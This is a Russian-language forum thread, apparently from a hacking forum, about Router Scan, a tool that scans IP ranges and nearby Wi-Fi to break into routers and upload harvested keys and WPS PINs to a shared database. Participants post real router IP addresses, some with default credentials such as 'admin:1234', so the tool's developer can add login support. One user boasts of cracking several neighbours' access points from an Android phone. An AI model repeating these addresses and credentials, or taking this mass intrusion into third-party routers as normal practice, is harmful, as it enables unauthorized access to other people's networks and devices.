Жаль что с вкладки wireless networks нельзя выгрузку в базу сделать а то у меня этих зверьков кучка ( Sercomm Wifire S1010 High-Speed Router) RS по воздуху щёлкает их на ура но при скане по ip адресу выдаёт только название роутера и больше никакой информации.

CRACK211
25.10.2017, 10:50
Жаль что с вкладки wireless networks нельзя выгрузку в базу сделать а то у меня этих зверьков кучка ( Sercomm Wifire S1010 High-Speed Router) RS по воздуху щёлкает их на ура но при скане по ip адресу выдаёт только название роутера и больше никакой информации.



Нащёлкайте все что сможете а потом правой кнопкой мыши потом выбираете экспорт таблицы а затем через сайт загружаете в базу )

Ossen
25.10.2017, 11:06
выбираете экспорт таблицы а затем через сайт загружаете в базу )



увы пытался этот вариант но не катит "Неподдерживаемый формат отчёта CSV,"

LolipopR
25.10.2017, 13:16
Тп линки плохо парсятся на этом диапазоне

http://31.181.62.137/

http://31.181.43.172/

Ossen
25.10.2017, 15:02
А первая строка в отчёте у вас такого вида:



нет такая "Active";"Stored";"Chn";"Hidden";"BSSID";"ESSID";"Security";"Key";"WPS PIN";"Level";"WPS";"Configured";

Kakoluk
25.10.2017, 16:04
нет такая "Active";"Stored";"Chn";"Hidden";"BSSID";"ESSID";"Security";"Key";"WPS PIN";"Level";"WPS";"Configured";



Маловато полезной информации для базы, даже если выбрать столбцы "BSSID";"ESSID";"Key";"WPS PIN".

(на мой взгляд)

Ossen
25.10.2017, 16:09
Маловато полезной информации для базы



Основная то информация присутствует "BSSID";"ESSID";"Security";"Key";"WPS PIN"

Pebenok70
25.10.2017, 16:19
Этот вообще не определился Archer C1200 v2.0 http://62.76.104.108:65080 admin

тоже unknown Archer C59 http://92.38.36.60:65080 admin:1234

http://95.46.148.221:65080 DIR615

binarymaster
25.10.2017, 19:26
Вот спасибо, попёрло... а ведь ночной сборкой сканил...



Надо всегда проверять, насколько сборка ночная, вдруг не совсем.



Что вам нужно в качестве образца?



IP адреса с веб мордами этих роутеров.



увы пытался этот вариант но не катит "Неподдерживаемый формат отчёта CSV,"



В крайнем случае можно отредактировать существующие отчёты, из таблицы Realtime, но делать это надо аккуратно.

TOX1C
25.10.2017, 21:10
Маловато полезной информации для базы,



Можно в ручную подпихнуть ip, пинг, логин с паролем, модель устройства и данные lan сегмента. Импротнуть в роутерскан и так загрузить, иначе не пропустит.

Pebenok70
25.10.2017, 21:33
увы пытался этот вариант но не катит "Неподдерживаемый формат отчёта CSV,"



Я так делаю, правильно заполнить и вперёд. У нас к какой многоэтажки не подойди 2-5 точки с андроида вскрываются

binarymaster
25.10.2017, 22:51
У нас к какой многоэтажки не подойди 2-5 точки с андроида вскрываются


Под Android есть смысл использовать это:

https://forum.antichat.ru/threads/router-scan-na-android.435481/

binarymaster
26.10.2017, 00:14
http://95.46.148.221:65080 DIR615



Добавил.

Pebenok70
26.10.2017, 13:18
Под Android есть смысл использовать это:

https://forum.antichat.ru/threads/router-scan-na-android.435481/



Давно как-то ставил, не пошло. Сейчас всё гугловское по удалял. А без Google play никак

binarymaster
26.10.2017, 21:18
Archer C1200 v2.0 http://62.76.104.108:65080 admin

Archer C59 http://92.38.36.60:65080 admin:1234



Добавили вместе с @Felis-Sapiens (https://forum.antichat.xyz/members/268504/).

Pebenok70
26.10.2017, 22:07
Гляньте ещё. Можно с ними, что сделать? DIR-300A http://95.46.142.158/admin/index.html#/summary Unknown

DSR-250N http://95.47.29.210:8080 Unknown (D-Link : Unified Services Router)

binarymaster
26.10.2017, 22:17
DIR-300A http://95.46.142.158/admin/index.html#/summary



Уже добавлено - та же прошивка, что у DIR-615 Rev. S, который вы скидывали выше.



DSR-250N http://95.47.29.210:8080 Unknown (D-Link : Unified Services Router)



Починил определение и логин.

Ossen
27.10.2017, 09:32
Перезалейте пожалуйста



с яд качает?

pnzkav
27.10.2017, 09:45
Если установить WinPcap для RS его драйверы на работу ComWIFI могут повлиять?

Hunter17
27.10.2017, 11:34
с яд качает?



Качает. Спасибо!

binarymaster
27.10.2017, 11:35
Если установить WinPcap для RS его драйверы на работу ComWIFI могут повлиять?



В теории могут. А ещё тут недавно обсуждалось, что драйверы от проприетарного CommView могут вызывать BSODы при использовании RS.

https://forum.antichat.ru/posts/4110467/

pnzkav
27.10.2017, 12:00
В теории могут. А ещё тут недавно обсуждалось, что драйверы от проприетарного CommView могут вызывать BSODы при использовании RS.

https://forum.antichat.ru/posts/4110467/



У меня не наблюдалось ,использую tplink 3200 свисток ,дрова ComWIFI стоят.

V777
27.10.2017, 12:16
неужели еще кто-то использует CommView

AlexUnder2010
27.10.2017, 20:51
С чем может быть связан лимит на active threads? Почему-то выше 125 не обрабатывает, пробовал подключатся к разным wi-fi сетям - результат тот же. Дело в адаптере intel 7260? На другом ноуте Асерос 9485 до 1000 тредов тянет